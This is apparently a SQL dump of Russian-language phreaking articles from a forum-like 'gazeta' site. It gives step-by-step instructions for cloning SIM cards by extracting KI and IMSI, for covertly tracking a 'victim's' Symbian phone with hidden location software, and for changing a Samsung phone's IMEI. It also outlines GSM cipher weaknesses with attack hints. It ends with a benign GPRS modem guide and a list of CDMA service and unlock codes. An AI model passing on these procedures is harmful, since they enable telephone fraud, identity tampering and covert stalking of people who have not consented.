происходит:<br />базовая станция (БС) посылает<br />случайное число (возможно 32-х<br />разрядное), соответственно телефон<br />получает его, передает в SIM-ку, она<br />шифрует по алгоритму A3-A8 с использованием KI, и далее результат<br />передается обратно на БС, таким<br />образом, KI никогда не передается в<br />эфир в открытом виде (из этого по<br />идее следует, что его невозможно<br />вычислить через эфир), далее базовая станция делает то же самое,<br />и в конце этого события сравнивает<br />свой результат с присланным, и если<br />он сходится, то можно звонить -<br />доступ к коммутатору разрешен.<br />Доставать их из симки мы будем с помощью SIM-карт ридера (его<br />можно собрать самому, схема и<br />ДОСовская программка одним<br />файлом: http://www.pda.com.ua/card/ invers.zip; или купить за 20 зеленых) и софтины под названием SimScan2<br />(скачать ее можно здесь: http:// uafm.narod.ru/SimScan2.00new.exe ).<br />Считываем KI и IMSI<br />1.Для этого подключаем SIM-карт<br />ридер к свободному COM порту<br />вашего компа и вставляем симку в<br />ридер. 2. Запускаем программу SimScan из<br />каталога С:sim_scansim_scan.exe (это<br />обязательно).<br />После первого запуска программа<br />загрузится с установками "по<br />умолчанию". Для начала выставим все<br />необходимые значения в программе:<br />COM Port – выбираем порт, к<br />которому подключен ридер<br />COM Port Speed – выставляем<br />значение 9600 bps 3.57 Mhz Ставим галочки напротив Get ATR и<br />напротив A38 Limit<br />Значение A38 Limit пишем 63488<br />3.Жмем кнопку Test и, если все<br />нормально, должно появиться окно<br />ATR с надписью ATR=3B 8A 00 92 01 59 91 09 00 01 05 01 00 (цифры могут<br />отличаться)<br />Если появилось сообщение об<br />ошибке, значит какие-то неполадки<br />в работе или настройках COM порта<br />или соединении. 4. Нажмите на кнопку "Find KI", после<br />чего начнется сканирование.<br />Процесс сканирования может занять<br />около часа, все зависит от вашего<br />компьютера, а точнее в большей<br />степени от процессора. После окончания процесса сканирования<br />появится окошко с этими самыми KI и<br />IMSI.<br />KI и IMSI будут автоматически<br />сохранены в текстовом файле Imsi_<br />ki.dat в папке программы C:sim_scan.<br />ОБЯЗАТЕЛЬНО ПОСЛЕ СОХРАНЕНИЯ<br />ПЕРЕИМЕНУЙТЕ ЭТОТ ФАЙЛ, ИНАЧЕ ПРИ<br />СЛЕДУЮЩЕМ СКАНИРОВАНИИ МОЖНО<br />ПОТЕРЯТЬ ДАННЫЕ.<br />Если после 60000 цикла подстановки криптограммы не будет найдено ни<br />одной пары ключа,<br />жмите "cancel" для остановки<br />процесса поиска. Выберите режим<br />"Strong Ki" и начните поиск заново.<br />Если же в итоге поиск не увенчается успехом, значит алгоритм<br />исследуемой sim-карты не<br />COMP128v1.<br />Multi-SIM карта<br />Далее нам нужно занести данные<br />коды в Multi-SIM карту. Multi-SIM карта похожа на обычную SIMку, а по<br />функциональности может заменить<br />до 10 симок (в зависимости от типа<br />Multi-SIM’ки), причем не обязательно<br />от одного оператора! С технической<br />точки зрения Multi-SIM карта (она же Clone Card) - это контактная чиповая<br />карточка (она же smart-карта) с<br />микропроцессором PIC и памятью<br />EEPROM. Для работы в качестве SIM-<br />карт (точнее их эмуляции) она<br />специально прошивается соответствующей прошивкой.<br />Прошивка эта записывается с<br />помощью программатора под<br />названием IC-Prog 1.05C, а сама<br />прошивка SIM-EMU 5. Но я не буду<br />описывать то, как прошить чистую карту на Multi-SIM так как это очень<br />сложно и из-за малейшей ошибки вы<br />не получите желаемого результата.<br />Проще купить уже готовую<br />прошитую карту. Стоит она около 10<br />зеленых, а купить ее можно на http:// www.kievsat.com/, там же можно купить программатор.<br />Возможности: для каждого номера<br />можно независимо указать номер<br />центра SMS и настройки GPRS. Какую<br />SIM загружать при включении<br />телефона вы выбираете, вводя соответствующий для каждой симки<br />PIN-код. Или же, если не хотите<br />каждое раз набирать его, задаете по<br />умолчанию какую симку загружать.<br />Так же в меню телефона появляется<br />новый пункт, из которого можно быстро переключиться на другую<br />симку (т.е. другого опсоса). Телефон<br />для этого выключать не надо.<br />Переключение (вместе с<br />регистрацией в сети) занимает<br />меньше 20 секунд. Вносим KI и IMSI в Multi-SIM карту<br />После того, как мы получили KI и<br />IMSI, внесем их в Multi-SIM карту. Для<br />этого вставьте Multi-SIM карту в свой<br />телефон.<br />Телефон попросит ввести PIN код, введите: 1111.<br />Выберите в меню телефона<br />появившийся раздел Sim-Emu.<br />Перейдите в закладку Configure. И<br />далее Config.Pos.<br />Телефон попросит ввести PIN2, введите: 1234.<br />Выберите позицию от 0 до 8 -<br />порядковый номер, в котором будет<br />находиться Ваш первый номер<br />телефона.<br />Внесите данные IMSI. Внесите данные KI (обязательно<br />вводите буквенные значения в<br />верхнем регистре!).<br />Далее телефон попросит ввести PUK,<br />введите любой номер, который<br />пожелаете. Дальше телефон попросит ввести<br />PIN, который будет активировать<br />необходимый вам номер при<br />переключении между номерами,<br />обычно это четыре первые (если<br />разные операторы) или последние цифры номера. После<br />подтверждения и правильного ввода<br />всех данных вас выбросит в главное<br />меню Sim-Emu и нужно нажать Reset.<br />Таким способом вносятся все<br />остальные данные для других номеров и операторов. Для<br />активации номера телефон<br />выключать не нужно, достаточно<br />нажать Reset и ввести PIN код<br />нужного номера телефона. Когда<br />телефон зарегистрируется в сети, под логотипом оператора высвечивается<br />название, например Phone #1,<br />которое можно отредактировать на<br />свой выбор.<br />Затем обычным способом внесите для<br />каждого телефонного номера соответствующие номера сервисных<br />центров для отправки SMS, и<br />остальные настройки типа GPRS и<br />телефонной книги. Все, карта готова<br />к использованию.","Клонирование SIM-карт","gazeta/img_815667.png","1375059214","4");
INSERT INTO gazeta_article VALUES("128","20","Довольно таки часто на форуме<br />возникают вопросы о том,<br />как найти абонента, выследить<br />мобильный телефон и.т.д.<br />Куча партнерок наживаются на этой<br />идее. Но таки существует несколько<br />софтовых решений для различных<br />платформ,<br />которые распространяются<br />естественно платно.<br />Сегодня я предлагаю рассмотреть бесплатный и простой вариант<br />слежки за абонентом,<br />который будет работать на<br />платформе Symbian 9.1-9.4<br />Список программ and other stuff,<br />необходимых для слежки за абонентом:<br />JBak TaskMan<br />X-Plore<br />PlanTask (настройка автозапуска)<br />Google Maps (Версия с поддержкой<br />локатора) Две почты на gmail.com<br />Взломанный смарт (манов по взлому<br />просто море)<br />Фишка способа заключается в том,<br />что все это будет работать скрыто и<br />автономно. Ставим X-Plore, PlanTask, Google Maps,<br />JBak TaskMan.<br />Запускаем Google Maps, вбиваем нашу<br />почту на gmail и посылаем запрос<br />авторизации на второй ящик.<br />Заходим на второй ящик и авторизуем его.<br />Далее в картах отключаем<br />определение местоположения с<br />помощью GPS.<br />Go в PlanTask и ставим регулярное<br />включение (и выключение) Google Maps (чем чаще будут включаться<br />карты,<br />тем чаще будет обновляться<br />информация о местоположении)<br />Следующий шаг выполняем в X-Plore.<br />Находим этот файл: !:\PlanTask\data \data.dat<br />(!- тут либо С- память телефона, либо<br />Е-карта памяти, зависит от того, куда<br />вы установили софт.)<br />Следующий файл !:\Private\10003a3f<br />\import\apps\PlanTask_reg.rsc Открываем его в hex-редакторе в X-<br />plore (цифрой 8), переходим в конец<br />файла<br />и отсчитываем приблизительно 20<br />пар байт и вместо нуля ставим один<br />(пример:22 36 "00" 00 00 00 00 00 00 12 00 00 00 00 00 00 00 00 12 00 00<br />00.меняем "00" на "01")<br />После изменения сохраняем файл и<br />после этого у нас должна пропасть<br />иконка PlanTask.<br />Аналогично изменяем "GoogleMaps_ 2000CEA3_reg.rsc", который лежит<br />рядом.<br />Идем в JBak TaskMan и ставим<br />правило "Никогда не показывать"<br />для программ Google Maps и PlanTask.<br />Иконки к программам мы убрали и теперь первый запускаем их<br />помощью ассоциаций через X-Plore.<br />Все эти нехитрые манипуляции<br />можно проводить вначале на своем<br />смарте,<br />и потом скидывать файлы настроек на телефон жертвы.<br />Хотя, впринципе, на все эти действия<br />уходит около 1-2 минуты.<br />Метод был протестирован на nokia<br />N97, N82, N96 и 5800.<br />morty10 forum.antichat.ru/ thread185415.html","Слежка за абонентом, определение<br />местоположения","gazeta/img_844623.png","1375059293","4");
INSERT INTO gazeta_article VALUES("129","20","Начнем пожалуй с теории - что такое<br />IMEI. IMEI (англ. International Mobile<br />Equipment Identity) —<br />международный идентификатор<br />мобильного оборудования, число<br />(обычно 15 разрядное в десятичном представлении), уникальное для<br />каждого GSM и UMTS мобильного<br />телефона. Модель и происхождение<br />телефона описываются первыми 8<br />цифрами IMEI (так называемый номер<br />TAC/Type Allocation Code). Оставшаяся часть — серийный номер с<br />контрольным числом в конце.<br />Устанавливается на заводе при<br />изготовлении, служит для<br />идентификации устройства в сети.<br />Хранится в прошивке аппарата, как правило написано на упаковке, в<br />гарантийном талоне, а также под<br />батареей мобильного телефона.<br />Играет роль серийного номера<br />аппарата. Передается в эфир при<br />авторизации в сети. IMEI используется для отслеживания аппаратов и для<br />блокирования краденых телефонов<br />на уровне оператора сотовой связи<br />(поверьте - в суровой России это миф,<br />знаю на личном опыте, конечно вы<br />получите свой телефон - но если у вас есть связи в ФСБ, хотя<br />сомнительно что они влезут из-за<br />одного телефона). Точность<br />определения, по различным данным,<br />составляет от нескольких десятков<br />метров до нескольких метров. Поэтому для спецслужб или силовых<br />структур при необходимости<br />вычислить местонахождение<br />человека с включенным мобильным<br />телефоном особых проблем не<br />составляет (это что бы вы знали что если сильно накосячили - то вас<br />найдут и вставят).<br />Не стоит забывать что смена IMEI в<br />некоторых странах уголовно<br />наказуема (Вообще перед тем как<br />ехать куда-то рекомендую быть реалистом и читать уголовный<br />кодекс).<br />Терь ближе к делу...Можно ли<br />изменить IMEI? Можно. Технические<br />аспекты смены IMEI зависят от модели<br />аппарата. В одних моделях (большинство старых телефонов и<br />аппараты азиатско-китайского<br />производства) смена IMEI<br />производиться достаточно легко –<br />достаточно специальной программы<br />и кабеля телефон-компьютер. В других моделях для полной смены<br />IMEI необходимо заменить на новые<br />часть электронных компонентов<br />телефона (микросхемы процессора,<br />флэш-памяти, либо контроллера),<br />после чего заново запрограммировать флэш-память<br />аппарата. Некоторые модели<br />допускают «неполную» смену IMEI,<br />при которой модифицируют<br />программное обеспечение телефона<br />(устанавливают патч к прошивке) таким образом, чтобы оно<br />передавало на базовую станцию<br />нужный номер IMEI, а не тот, который<br />запрограммирован в аппаратных<br />средствах телефона. При «неполной»<br />смене IMEI исходное значение IMEI будет восстановлено после<br />обновления программного<br />обеспечения телефона. Юридические<br />аспекты мы рассматривать не будем -<br />по умолчанию мы знаем на что идем<br />(ст. 272-273 у.к. РФ). Однако хочу заметить что в реальной судебной<br />практике были как факты вынесения<br />обвинительных заключений с<br />назначением наказания виде трех лет<br />лишения свободы условно, так и<br />закрытия дел по причине отсутствия состава преступления. В зависимости<br />от страны максимальные сроки<br />наказания, за совершение подобных<br />преступлений, достаточно жесткие –<br />до 5-8 лет лишения свободы.<br />Практика...Так как у меня телефон самсунг - то и расмотренны будут<br />модели этой фирмы (позже добавлю<br />описания к другим, но так как<br />содержание алкоголя в крови<br />сегодня зашкаливает - то...чуть<br />позже ) Для смены прошивки (и изменения IMEI) нам нужен будет<br />сервисный кабель (в комплекте часто<br />ложат дата-кабель, который не<br />пригоден для таких целей).<br />Скажу сразу что процедура смена IMEI<br />схожа на многих телефонах. Для работы нам пригодяться сам<br />аппарат, правильная прошивка,<br />кабель прошивки и необходимый<br />софт. Спешу вас обрадовать - все что<br />касается софта - все можно найти на<br />специализированных форумах. Не будьте ленивыми. Перед началом вы<br />должны отдавать трезвый отчет в<br />действиях. Внимание! Питание не<br />должно быть отключено до конца<br />процедуры. Поэтому лучще шить с<br />ноутбука с предварительно полностью заряженной батареей.<br />Иначе проблемы могут быть очень<br />серьезными (а представьте что<br />половина операции и свет вырубили<br />и ....мобила будет R.I.P.). Расмотрим на<br />примере Samsung IMEI changer. Я специально не выкладываю этот<br />софт (и в личку не стучать) - его<br />можно найти в интернете (но<br />проверяйтесь на вирустотале!!!).<br />Убедитесь что софт работает с вашей<br />моделью!!! Порядок действий: 0. (У программистов счет с 0!). Теперь<br />внимательно 10 раз читаем порядок<br />действий!!<br />1.Запустите программу test.exe<br />2.В открывшемся окне программы<br />GSM Phone Test Program V1.0 нажмите кнопку Download<br />3.Откроется окно WTDN RAM<br />Downloader<br />4. Нажмите для 5.Нажмите кнопку Open и из каталога<br />TEST откройте файл,<br />соответствующий модели вашего<br />телефона.<br />Пример: для модели N500 нужно<br />открыть файл N500.axf (Как я говорил - искать эти файлы<br />нужно заранее, причем только для<br />вашей модели)<br />6. Нажмите кнопку Line Settings и в<br />открывшемся окне Comport Line<br />Settings (Настройки ком-порта) выставьте следующие значения:<br />Baud Rate: 115200 (это скорость<br />порта)<br />Data Bits: 8<br />Stop Bits: 1<br />Parity: None Port: Com1 (внимание - номер ком<br />порта, к которому подключен кабель<br />и телефон!!)<br />7. Кнопкой OK закройте окно<br />настроек.<br />8. Убедитесь что кабель подключен к телефону и нажмите кнопку Start<br />9. Процесс загрузки длиться по<br />времени примерно 10 секунд (зависит<br />от модели и возможностей вашего<br />компа)<br />10. После окончании загрузки программа выдаст сообщение<br />Downloading operation finished<br />11. Нажмите OK, окно WTDN RAM<br />Downloader автоматически закроется<br />и перед вами появиться меню выбора<br />дальнейших действий. 12. Нажмите кнопку EXIT для того<br />чтобы выйти из программы.<br />13. Внимание! Если меню не<br />появиться, нужно проверить<br />соединения и повторить все сначала.<br />(ищите где ошиблись, да прибудет с вами гугль!)<br />14. Если у вас до этого момента все<br />получилось, поздравляю вас, юные<br />фрикеры, теперь не будем терять<br />время - сразу же запускаем<br />программу IMEI.exe 15. 16.В строку New IMEI вводим IMEI<br />номер и нажимаем кнопку Change<br />IMEI<br />17. Если программа выдаст<br />сообщение об ошибке - это означает,<br />что либо телефон не подключен, либо он находиться не в тест режиме,<br />либо программа не работает с данной<br />моделью.<br />18. Если пункта 17 нет - то все<br />отлично<br />Несколько рекомендаций от меня: 1. Если вы не уверены хотя бы в<br />мельчайшей детали - не делайте<br />этого! Лучше разобраться и понять,<br />чем потом нести на помойку<br />2. Данная статья только в<br />ознакомительных целях. 3. За ваши действия я не отвечаю -<br />вы делаете на свой страх и риск!<br />Запомните это. Если мобильник из не<br />дешевых - купите старенький,<br />практика будет только плюсом.<br />4. Буду пополнять статью по мере возможности - выкладывать обзоры<br />как шить другие модели, а так же<br />возможно модели телефонов, с<br />которыми лучше всего иметь дело, и<br />если останеться время - то возможно<br />затрону gsm модемы... Аутро:<br />Владельцы самсунгов(проверено на<br />SWIFT платформе) могут сбросить<br />свой IMEI кодом на клавиатуре<br />*2767*3855#. Но произойдет полный<br />сброс - все будет потеряно!!! iMEI смениться на стандартный<br />заводской!!! Делайте это на свой<br />страх и риск - восстановить его будет<br />намного сложнее!!","Подробнее про IMEI","gazeta/img_247722.png","1375059375","4");
INSERT INTO gazeta_article VALUES("130","20","Введение<br />Как-то я прочитал про стандарты<br />применяемые в GSM. Было особенно<br />весело после прочтения слов<br />Джеймса Морана, директора<br />подразделения, отвечающего в консорциуме GSM за безопасность и<br />защиту системы от мошенничества:<br />"Никто в мире не продемонстрировал<br />возможность перехвата звонков в<br />сети GSM. Это факт... Насколько нам<br />известно, не существует никакой аппаратуры, способной осуществлять<br />такой перехват". А какой бред иногда<br />встречаешь в Internet про GSM .<br />А ведь стандарту GSM (Global System<br />for Mobile communications) сегодня<br />принадлежит 80% мирового рынка цифровой мобильной связи. И им<br />пользуются свыше 250 млн. людей.<br />Дак почему же не попользоваться за<br />их счет? Хмм... вопрос этики или<br />нахождения радиосканера (законно<br />ли это ?). Хотя ведь операторы в России разрешают пользоваться<br />ворованными телефонами, а у них<br />защита заложена в основе GSM и для<br />этого имеются черные списки<br />International Mobile Equipment Identity<br />( на Западе ). А может с ними делятся те кто продает ворованные<br />телефоны ?<br />Защита GSM и как она создавалась<br />В принципе, по своему замыслу,<br />цифровая система мобильной связи<br />GSM вполне могла бы быть чрезвычайно защищенной. В основе<br />ее лежит свод документов под<br />названием "Меморандум о понимании<br />стандарта GSM" или MoU Groupe<br />Special Mobile standard. Этот<br />Меморандум был подготовлен на излете Холодной войны по<br />инициативе ведущих<br />телекоммуникационных компаний<br />Западной Европы. Разрабатывал<br />техническую документацию GSM<br />Европейский институт стандартов по телекоммуникациям (ETSI), а в<br />создании схемы безопасности, в<br />целом призванной защитить новую<br />систему от перехвата, прослушивания<br />и мошенничества, активное участие<br />приняли спецслужбы стран НАТО. Основу системы безопасности GSM<br />составляют три секретных алгоритма<br />(официально не раскрытые и поныне,<br />сообщаемые лишь тем, кому это<br />требуется по необходимости -<br />поставщикам оборудования, операторам связи и т.д.):<br />А3 - алгоритм аутентификации,<br />защищающий телефон от<br />клонирования;<br />А8 - алгоритм генерации<br />криптоключа, по сути дела однонаправленная функция, которая<br />берет фрагмент выхода от A3 и<br />превращает его в сеансовый ключ<br />для A5;<br />A5 - собственно алгоритм<br />шифрования оцифрованной речи для обеспечения<br />конфиденциальности переговоров. В<br />GSM используются две основные<br />разновидности алгоритма: A5/1 -<br />"сильная" версия шифра для<br />избранных стран и A5/2 - ослабленная для всех остальных (для<br />России).<br />Мобильные станции (телефоны)<br />снабжены смарт-картой,<br />содержащей A3 и A8, а в самом<br />телефоне имеется ASIC-чип с алгоритмом A5. Базовые станции<br />также снабжены ASIC-чипом с A5 и<br />"центром аутенитификации",<br />использующим алгоритмы A3-A8 для<br />идентификации мобильного<br />абонента и генерации сеансового ключа.<br />Вся эта архитектура при надлежащем<br />исполнении и качественных<br />алгоритмах призвана гарантировать<br />надежную аутентификацию<br />пользователя, обеспечивая защиту мобильных станций от клонирования<br />и прочих методов мошенничества, а<br />также качественное шифрование<br />конфиденциальных переговоров.<br />Собственно говоря, именно это и<br />декларируется компаниями, успешно занимающимися разворачиванием<br />GSM по всему миру и уже<br />охватившими услугами удобной<br />связи, по разным подсчетам, от 210<br />до 250 миллионов человек на<br />планете. Но реальность такова, что<br />спецслужбы, занятые защитой<br />правительственных коммуникаций,<br />одновременно вовлечены и в<br />деятельность противоположного<br />рода: перехват и дешифрование коммуникаций в разведывательных<br />целях. По этой причине, как<br />свидетельствуют очевидцы, вокруг<br />степени защиты GSM бушевали<br />немалые страсти, поскольку<br />спецслужбы стран НАТО имели довольно разные точки зрения на<br />этот счет. Германия настаивала на<br />сильных алгоритмах, поскольку<br />имела самую длинную границу с<br />коммунистическим блоком, другие же<br />страны склонялись к ослабленному варианту. В конце концов в качестве<br />основы криптосхемы для A5 была<br />избрана французская разработка.<br />Описание алгоритмов шифрования<br />GSM и взлом<br />A5 реализует поточный шифр на основе трех линейных регистров<br />сдвига с неравномерным движением.<br />Такого рода схемы на языке<br />специалистов именуются<br />"криптографией военного уровня" и<br />при верном выборе параметров способны обеспечивать очень<br />высокую стойкость шифра. Однако, в<br />А5 длины регистров выбраны очень<br />короткими - 19, 22 и 23 бита, что в<br />сумме и дает 64-битный сеансовый<br />ключ шифрования в GSM. Уже одни эти укороченные длины регистров<br />дают теоретическую возможность<br />для хорошо известной лобовой<br />атаки, когда перебирают заполнение<br />двух первых регистров (сложность<br />порядка 240 ), восстанавливая содержимое третьего регистра по<br />выходной шифрующей<br />последовательности (с общей<br />сложностью порядка 245).<br />До анализа A5 дошли руки у<br />сербского криптографа д-ра Йована Голича специалиста по поточным<br />шифрам . С чисто теоретических<br />позиций он описал атаку,<br />позволяющую вскрывать начальные<br />заполнения регистров всего по 64<br />битам шифропоследовательности с трудозатратами около 240.<br />Проведенный в стенах Microsoft<br />эксперимент действительно привел к<br />вскрытию ключа, но понадобилось<br />для этого около двух недель работы<br />32-узлового кластера машин PII-300 . ( Все-то у них не как у людей или они<br />были заинтересованы в плохой<br />реализации алгоритма ? Сейчас<br />достаточно пары секунд).<br />В апреле 1998 г. группа<br />компьютерных экспертов из Калифорнии широко объявила и<br />продемонстрировала, что ей удалось<br />клонировать мобильный телефон<br />стандарта GSM . Ранее всеми по<br />умолчанию предполагалось, что<br />цифровые сети GSM гораздо надежнее защищены от этой<br />напасти, приносящей миллионные<br />убытки сетям аналоговой сотовой<br />телефонии.Возглавлял группу Марк<br />Брисено, директор так называемой<br />"Ассоциации разработчиков смарт- карт" или SDA (Smartcard Developer<br />Association), представляющей<br />интересы разработчиков<br />программного обеспечения для<br />смарт-карт. Избрав своей целью<br />стойкость GSM к попыткам клонирования, исследователи<br />занялись обратной разработкой<br />модуля SIM. Это та самая смарт-карта,<br />что вставляется в сотовый телефон,<br />содержит алгоритмы A3-A8 и<br />однозначно идентифицирует абонента. В процессе подготовки к<br />работам по вскрытию содержимого<br />чипа, в руки к исследователям<br />неисповедимыми путями попало<br />описание "алгоритма COMP128" -<br />наиболее широко распространенной практической реализации A3-A8 в<br />SIM-модулях. Эта документация<br />помогла быстрее и полностью<br />восстановить всю необходимую<br />информацию о схеме. После этого<br />Брисено пригласил для ее анализа двух молодых, но уже известных<br />криптоаналитиков, аспирантов<br />Калифорнийского университета в<br />Беркли Дэвида Вагнера и Иэна<br />Голдберга. Тем понадобилось всего<br />несколько часов, чтобы отыскать в схеме фатальные прорехи и<br />разработать метод извлечения из<br />карты секретного содержимого с<br />помощью всего 219 опросов чипа<br />смарт-карты.(?! очередной бред -<br />столько опросов смарт-карты надо делать, если не знаешь алгоритма, а<br />ведь документы у них были ).<br />Взлом A3-A8: слишком элементарен :<br />достаточно прочитать описание и<br />если не понятно все еще, то обратить<br />внимание на факт,изменяя байты i +16,i+24 ввода COMP128 мы можем<br />надеятся на коллизию в байтах i,i+8,i<br />+16,i+24 после двух раундов<br />шифрования. Парадокс дней<br />рождения ( если считать, что дни<br />рождения распределены равномерно, то в группе из 24<br />человек с вероятностью 0,5 у двух<br />человек празднования дней<br />рождения совпадут) гарантирует это<br />довольно быстро (так как всего 4<br />байта ). Коллизия в втором раунде будет обнаруженна после выявления<br />коллизия в общем выводе COMP128.<br />И каждая коллизия может<br />использоватся для изучения байт i,i+8<br />ключа на основе<br />дифференционального анализа. Взлом A5/2 : (Хотя в MoU признают,<br />что вскрываемость шифра и была<br />целью разработки A5/2, тем не менее<br />в официальных результатах анализа<br />SAGE сказано, что им неизвестно ни о<br />каких криптографических дефектах в A5/2.. Xa-xa-ха - это же для России.<br />Какие дефекты могут быть в решете?<br />Вывод: носите воду в решете. )<br />Известно, что в этой схеме добавлен<br />еще один короткий регистр длиной<br />17 бит, управляющий движением бит в остальных трех регистрах, .для<br />вскрытия системы достаточно<br />лобовым перебором (сложность 216<br />= 65536 отыскать заполнение<br />управляющего регистра. Делается<br />это всего по двум фреймам сеанса связи длиной по 114 бит (в системе<br />GSM первые два фрейма<br />шифрпоследовательности известны,<br />поскольку шифруются одни нули)<br />.Про остальное вы нигде информации<br />не найдете, поэтому я дам подсказку: A5- криптосхема на основе регистров<br />сдвига с линейной обратной связью<br />имеет комбинирующий генератор<br />для получения шифрующей<br />последовательности. Поэтому надо<br />использовать слабости в комбинирующей функции, которые<br />позволяют по выходной<br />последовательности получить<br />информацию об отдельных входных<br />последовательностях узла<br />усложнения. В этом случае говорят, что имеется корреляция между<br />выходной последовательностью и<br />одной из внутренних<br />последовательностей. Вследствие<br />такой корреляции отдельная<br />внутренняя последовательность может быть проанализирована<br />индивидуально вплоть до<br />восстановления начального<br />заполнения соответствующего<br />регистра, затем внимание надо<br />переключить на одну из других внутренних последовательностей.<br />Подобным способом может быть<br />восстановлен весь генератор - этот<br />метод часто называют атака<br />"разделяй-и-вскрывай". Причем<br />первым из регистров надо выбрать тот, который проще чем остальные<br />восстановить.","Описание GSM","gazeta/img_795554.png","1375059473","4");
INSERT INTO gazeta_article VALUES("131","20","Если вам часто приходится работать<br />через GPRS-соединение с разными<br />операторами, но с одним телефоном,<br />то вероятно вам уже надоело менять<br />каждый раз в настройках модема<br />строку инициализации AT+CGDCONT. Казалось бы, можно как с обычными<br />провайдерами - набирать разные<br />номера и всё, но для GPRS так не<br />получается (строчка инициализации<br />каждому оператору нужна своя).<br />Попробуем сегодня избавиться от этой проблемы. Раз и навсегда.<br />Итак, начнём изучать AT-команды<br />GPRS1. Рассмотрим2 некоторые<br />аргументы команды AT<br />+CGDCONT=<cid>,<PDP_type>,<APN>:<br />cid (Context identifier) - это номер создаваемого профиля настроек;<br />PDP_type (Packet data protocol type) -<br />тип соединения (обычно "IP");<br />APN (Access point name) - адрес точки<br />доступа (например, "internet.mts.ru").<br />Таким образом, строчка вида AT +CGDCONT=1,"IP","internet.mts.ru"<br />регистрирует соответствующие<br />настройки в профиле с номером 1.<br />Что же происходит потом? Для<br />установки связи используется<br />команда набора номера *99***1#. Рассмотрим описание команды<br />набора ATD*<GPRS_SC>***<cid># в<br />режиме GPRS:<br />GPRS_SC - это константа, всегда<br />равная 99 (для идентификации<br />принадлежности строчки к GPRS, а не обычной телефонии);<br />cid - уже знакомый нам<br />идентификатор профиля.<br />Таким образом, команда набора<br />номера *99***1# в действительности<br />устанавливает соединение по первому профилю настроек. Также<br />отмечу, что профиль 1 используется<br />по умолчанию, и в некоторых<br />инструкциях может быть<br />предложена более короткая<br />команда набора *99# - это полный аналог *99***1#.<br />Отсюда возникает логичный вывод,<br />что надо просто зарегистрировать<br />несколько профилей3 и уже для<br />набора номера GPRS создать<br />различные соединения с разным значением <cid> в строчке номера.<br />Итак, в свойствах GPRS-модема, в<br />дополнительной строке<br />инициализации надо указать такую<br />команду (поправив, разумеется,<br />значения APN под своих операторов) 4:<br />AT+CGDCONT=1,"IP","internet.mts.ru";<br />+CGDCONT=2,"IP","internet.beeline.ru"<br />А потом, создать два соединения и<br />одному указать номер набора<br />*99***1#, а другому *99***2#. Вот и всё.<br />--------------------------------------------------<br />------------------------------<br />1. Подробные описания по AT-<br />командам для GSM-телефонов можно<br />найти на сайте European Telecommunications Standards<br />Institute. http://www.etsi.org 2. Мы, по понятным причинам,<br />приводим неполное описание (в<br />действительности аргументов у этих<br />команд может быть больше).<br />3. Многие телефоны имеют только<br />два профиля (1 и 2). Узнать сколько их у конкретной модели можно в<br />терминальной программе, напечатав<br />команду AT+CGDCONT=?. Первый<br />диапазон выданных аргументов для<br />режима "IP" укажет на количество<br />профилей. Например, в ответе "+CGDCONT: (1-2),"IP",,,(0),(0)" указано,<br />что телефон поддерживает два<br />профиля.<br />4. Для тех, кто уже был знаком с<br />системой AT-команд простых<br />модемов, замечу тот факт, что расширенные AT-команды у<br />телефонов соединяются между собой<br />в строке не напрямую, а через символ<br />";".","Как настроить GPRS-модем для двух<br />операторов","gazeta/img_230165.png","1375059526","4");
INSERT INTO gazeta_article VALUES("132","20","Коды доступа на телефоны стандарта<br />CDMA<br />AUDIOVOX 7900<br />Menu #(кл. конверт) * 1<br />AUDIOVOX 8610/8910<br />##847446(Выкл) пароль 000000 или 111111 (Стандартный SPC 072096--<br />для 8910)<br />AUDIOVOX 8910<br />для вывода телефона из сервис-<br />режима ##27752345 вкл<br />AUDIOVOX 8910 для вывода телефона из сервис-<br />режима ##737247 вкл<br />AUDIOVOX FT 3200<br />45680*47*869#1<br />COMPAL<br />**321456987## EPSILON<br />**321456987##,<br />**3214569871472365## снятие лок<br />кода<br />Kyocera KX-2<br />111111 (потом правая смарт клавиша)<br />Kyocera K112<br />236288<br />LG DM510 / DM150<br />menu 3 0 далее код<br />LG SV590 Menu 0, SPC code : 852456<br />a-key : *542362*2539*<br />LG 2130/2230<br />#542362#*542362*<br />LG VX3200<br />Menu-0(000000) LG VX9800(the V)<br />на большой клавиатуре нажать<br />кнопку Sym, 3477247, CLR, CLR, 1<br />LG 5130<br />#542362#*735130*<br />LG 6130 #542362#*736130*<br />LG 5550 код доступа в инженерное<br />меню<br />##7764726 save<br />Пароль на LG PM-325<br />инженерное меню : ##2342# открытие окна AKEY : ##2539#<br />NOKIA 3586i<br />*3001#12345#<br />NOKIA Sprint<br />##3282#<br />NOKIA 6305 код программирования ##7764726 Send<br />NOKIA 8587<br />*#626#7764726#<br />SKY 1400 / 3000 / 5000 / 5100 /<br />5400(Израиль)<br />#7583538324#626# SKY 5400 (корейская прош.) / 6100 /<br />6200<br />*759#626*7388464#<br />SKY 6400<br />*759#364*7388464<br />SAMSUNG A740 ( BELL )/A860 ( BELL ) ##675 OK<br />SAMSUNG A530/A620/N195/N356<br />menu 6 *<br />SAMSUNG N362(Израиль)<br />4367905#*10*#*913620<br />SAMSUNG A460/N240/A500/N400 ##000000<br />SAMSUNG A610<br />menu 9 *<br />SAMSUNG A630<br />menu 5 *<br />SAMSUNG A300/N105/A100/A562/A611 47*869#08#9 and menu 60<br />SAMSUNG A560<br />##3282#<br />SAMSUNG A660<br />menu ##000000 ok and ##3282 ok<br />SAMSUNG A670 menu 7 2 * (000000)<br />SAMSUNG A680<br />##000000##<br />SAMSUNG A790<br />menu 0 and menu 2 0<br />SAMSUNG A860 menu, setting *<br />SAMSUNG X, E, V-серия<br />6548#0**4#6 and 47*869#08#9 and<br />74153697193<br />SAMSUNG E300<br />741 53 697 193 SONY ERICSSON T608<br />923885 стрелка вправо<br />TELSON ТДС 320<br />menu 4 0 000000<br />MOTOROLA V710/V265<br />menu 073887* (быстро) MOTOROLA V8160<br />FCN 13 раз цифра"0" RCL<br />Kод доступа на Motorola RAZR V3<br />(americ)<br />#073887*<br />MOTOROLA MS600 5759789*# 3раза фото 915037<br />Пароль на MOTOROLA без а -кей<br />5 7 5 9 7 8 9 * # потом кнопку камеры<br />3 раза (код 915037)<br />Сделать полный сброс на MOTOROLA<br />V8160 FCN 00**83786633 STO далее 32# 01#<br />MODOTTEL (Withus) W100/200/300<br />##948487 ok<br />VK X100<br />код програмирования<br />153147539741593TV TOSHIBA 9100 / 9155 / 9500<br />В течении 10 сек. после включения<br />289 FCN #1<br />Z T E 150<br />код програмирования : *983*3641#<br />Как вводить A-key code HYUNDAI 310/610: 2539 menu menu<br />NOKIA 3586/3588 2539 end end<br />Многие др.модели 